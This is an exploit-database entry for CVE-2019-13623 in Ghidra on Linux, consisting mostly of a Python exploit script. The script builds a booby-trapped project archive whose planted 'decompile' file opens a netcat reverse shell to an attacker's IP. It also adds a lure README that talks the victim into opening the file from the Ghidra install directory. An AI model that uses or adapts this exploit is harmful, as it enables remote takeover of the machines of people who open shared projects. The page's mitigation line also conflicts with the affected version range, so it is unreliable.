Ghidra-Exploit

vendor:

Ghidra

by:

Etienne Lacoche

7.8

CVSS

HIGH

Command Injection

CWE

Product Name: Ghidra

Affected Version From: Ghidra Linux version <= 9.0.4

Affected Version To: Ghidra Linux version <= 9.0.4

Patch Exists: YES

Related CWE: CVE-2019-13623

CPE: a:ghidra:ghidra

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu 18.04

2019

This exploit allows an attacker to inject arbitrary commands into Ghidra Linux version <= 9.0.4. The exploit is achieved by creating a malicious .gar file which contains a malicious decompile file. The malicious decompile file contains a command injection payload which is executed when the .gar file is opened in Ghidra. The malicious payload is used to open a reverse shell to the attacker's machine.

Mitigation:

Upgrade to Ghidra version 9.0.4 or later.

Source

Exploit-DB raw data:

import os
import inspect
import argparse
import shutil
from shutil import copyfile

print("")
print("")
print("################################################")
print("")
print("------------------CVE-2019-13623----------------")
print("")
print("################################################")
print("")
print("-----------------Ghidra-Exploit-----------------")
print("--Tested version: Ghidra Linux version <= 9.0.4-")
print("------------------------------------------------")
print("")
print("################################################")
print("")
print("----------Exploit by: Etienne Lacoche-----------")
print("---------Contact Twitter: @electr0sm0g----------")
print("")
print("------------------Discovered by:----------------")
print("---------https://blog.fxiao.me/ghidra/----------")
print("")
print("--------Exploit tested on Ubuntu 18.04----------")
print("-----------------Dependency: zip----------------")
print("")
print("################################################")
print("")
print("")

parser = argparse.ArgumentParser()
parser.add_argument("file", help="Path to input export .gar file",default=1)
parser.add_argument("ip", help="Ip to nc listener",default=1)
parser.add_argument("port", help="Port to nc listener",default=1)

args = parser.parse_args()
            
if args.ip and args.port and args.file:

    rootDirURL=os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
    path = "../Ghidra/Features/Decompiler/os/linux64/decompile"
    os.system("mkdir -p ../Ghidra/Features/Decompiler/os/linux64/")
    os.system("echo 'rm -f x; mknod x p && nc "+args.ip+" "+args.port+" 0<x | /bin/bash 1>x' > decompile")
    os.system("chmod +x decompile")
    copyfile("decompile",path)
    copyfile(args.file,rootDirURL+"/"+"project.gar")
    os.system("zip -q project.gar ../Ghidra/Features/Decompiler/os/linux64/decompile")
    os.system("echo 'To fully export this archive, place project.gar to GHIDRA_INSTALL_DIR root path and open it with Restore Project at Ghidra.' > README_BEFORE_OPEN_GAR_FILE")
    os.system("zip -q project.zip README_BEFORE_OPEN_GAR_FILE")    
    os.system("zip -q project.zip project.gar") 
    os.system("rm decompile README_BEFORE_OPEN_GAR_FILE")
    os.system("rm project.gar")
    print("You can now share project.zip and start your local netcat listener.")
    print("")
    print("Project.gar must be placed and opened by victim at GHIDRA_INSTALL_DIR")
    print("root path for payload execution.")
    print("")